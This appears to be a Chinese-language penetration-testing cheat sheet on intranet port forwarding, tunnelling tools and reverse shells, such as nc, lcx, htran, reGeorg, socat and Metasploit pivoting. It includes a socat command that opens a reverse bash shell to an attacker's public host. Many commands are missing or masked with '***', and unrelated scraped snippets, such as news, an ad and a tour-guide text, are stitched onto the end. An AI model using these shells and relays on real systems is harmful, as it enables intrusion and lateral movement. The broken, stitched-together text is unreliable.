本文作者: 掉到鱼缸里的猫(Ms08067内网安全小组成员)
文章来源|MS08067 内网安全知识星球
内网纵横四海 认准Ms08067
NetCat
*** 一:
靶机:
攻击机:nc -nv 靶机IP 靶机监听端口
反向Shell:
靶机:
不能转发3389
正向shell
靶机:
攻击机:nc 目标IP 端口
lcx
服务端:lcx -slave 公网IP 公网端口 本地IP 本地端口
公网客户端:lcx -listen 远程端口 本地端口
客户端连接本地端口,对应于连接远程端口
先启动listen,再启动slave
reGeorg
服务端:上传脚本到Web目录,服务器要求打开 enable_dl 功能
同时安装 php_sockets扩展客户端:
使用Proxifier将需要的流量引入本地端口sock5模式
有脚本可以指定不使用sock5协议
Tunna
使用Proxifier将需要的流量引入本地端口sock5模式
使用 -n 参数关闭sock协议
这个False问题不大
不能用linux的rdesktop连接,要用Windows的远程桌面连接
这种情况问题也不大
点击是之前再运行一次脚本就行
reDuh
服务端:上传脚本到Web目录
客户端:java -jar reDuhClient.jar http://脚本位置 进行连接
本地连接java返回的本地端口 nc -vv localhost 本地端口
在命令提示符中输入 [createTunnel]本地空闲端口:目标地址(想要访问的目标内网地址):目 标端口
htran
服务器(目标主机):htran -slave 跳板IP 跳板port 本地ip 本地端口
跳板机:htran -tran 跳板port 公网IP 公网端口
客户端(公网主机):htran -listen 公网监听端口 流量接收端口
socat
靶机:socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:公网IP:公网端口
攻击机:socat TCP-LISTEN:端口 - ,nc监听也行
SSH
穿透两个 ***
公网跳板A:跳板A在B和C的两个内网中间
本地流量转发
为什么说是“本地”(单纯的-L选项):
本地端口转发绑定的是 lookback 接口,这意味着只有localhost 或者 127.0.0.1 才能使用本机的端口转发 ,
其他机器发起的连接只会得到“ connection refused. ”
但是可以利用GatewayPorts(-g)关键字来与其他机器共享这个本地转发端口。
远程转发
动态转发
两层ssh
NPS
Earthworm(EW)
EW 是一套便携式的 *** 穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂 *** 环境下完成 *** 穿透。
iox
ngrok
各种系统都支持,支持内网穿透
利用IIS端口共享功能
……说实话,没来得及尝试,单看文档没看懂
利用IIS的端口共享功能绕过防火墙
反弹shell
NC/Telent
telnet 可以换成 nc
*** 一:
成功后没有提示,尝试命令即可
*** 二:
*** 三:
*** 四:
*** 五:
并不是所有的NC都有-e选项……有些设备可能/bin下面没有nc,但是busybox可以啊
bash 反弹shell
加密流量参看权限维持笔记
利用awk、gawk
1. 攻击机执行监听
2. 靶机执行
Python 反弹shell
命令行直接执行 python -c '代码'
php反弹shell
命令行执行 php -r '代码'
java反弹shell
Perl反弹Shell
命令行执行 perl -e ‘代码’
Lua
Ruby
Node.js
利用sshd反弹shell
*** 一:
*** 二:
1. 靶机执行:
2. 攻击机执行:
MSF 反弹shell 一句话
msfvenom -l payloads | grep "cmd/unix"|awk '{print $1}'
xterm下反弹
Metasploit穿透双层 ***
攻击机通过两层跳板,对192.168.12.0/24 *** 进行扫描
1. 攻击机获得双网卡主机A的meterpreter会话
2. 执行命令,创建路由规则,只要会话不断开Metasploit框架就可以访问192.168.11.0/24网段
3. 配置流量转发 ***
4. 在proxychains配置文件中添加sock4 *** 规则,即可通过proxychains实现流量转发
5. 实现端口转发
6.获取双网卡主机B的控制权(使用bindTCP的payload,因为反向shell无法路由到攻击机),获取到meterpreter会话之后添加路由规则
7. 再次配置流量转发 *** (再开个新端口)
8. 修改proxychains配置文件,取消下文的注释,添加新的socks4 ***
利用系统自带功能
Windows 双网卡路由
双网卡Windows主机作为路由:
1.通过注册表允许网卡进行流量转发: 修改注册表
2. 开启 Routing and Remote Access 服务
3. 两侧主机添加静态路由规则,路由指向双网卡主机
Windows netsh命令端口转发
管理员权限cmd执行
不成功的话,先关闭防火墙
查看端口映射配置:
netsh interface portproxy show all
1.为e:\f.exe 添加防火墙规则,需要管理员权限。
删除
2、添加端口
删除
iptables:
两条链重要功能在于修改IP,而这两条链修改的IP又是不一样的,POSTROUTING在修改来源IP,PREROUTING则在修改目标IP 。
由于修改的 IP 不一样,所以就称为来源NAT (Source NAT, SNAT) 及目标 NAT (Destination NAT, DNAT)。
只用POSTROUTING:从请求侧来看的话,只修改源IP
两个结合起来就可以当做端口转发了:
参考
常见端口转发工具的使用方式
浅谈内网端口转发
Linux iptables用法与NAT
据科技部官网,为促进我国移动通信产业发展和科技创新,推动第六代移动通信(6G)技术研发工作,2019年11月3日,科技部会同发展改革委、教育部、工业和信息化部、中科院、自然科学基金委在北京组织召开6G...
英 语:i love you 法 语:je t’aime,je t’adore 德 语:ich liebe dich 希 腊语:s’agapo 犹 太语:ani ohev otach(male o...
以前我们都把靠脸用饭看成一句笑谈,除非你真是人中龙凤,貌美如花,直到刷脸认证泛起后,许多平台都用上了,普通人也可以靠脸免费赚钱。好比这个“微米素”,实名认证刷脸,免费赠予“实名米素包”,天天看10个广...
文件办理 185.222.202[.]79:443XSS 主动点按钮有什么损害?cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 ef...
谷歌黑客找sql注入点相关问题 黑客专属名字相关问题 白客怎么对付黑客 geeker黑客模拟软件(黑客模拟软件下载)...
导游自我介绍欢迎词和导游词都是有一个固定的模式,根据你所面对的旅游团队不同,可以有重点的侧重介绍你自己和致欢迎。 欢迎词也是属于导游词的一种,主要是介绍自己、公司、及司机,还需要简单介绍行程。 1、各...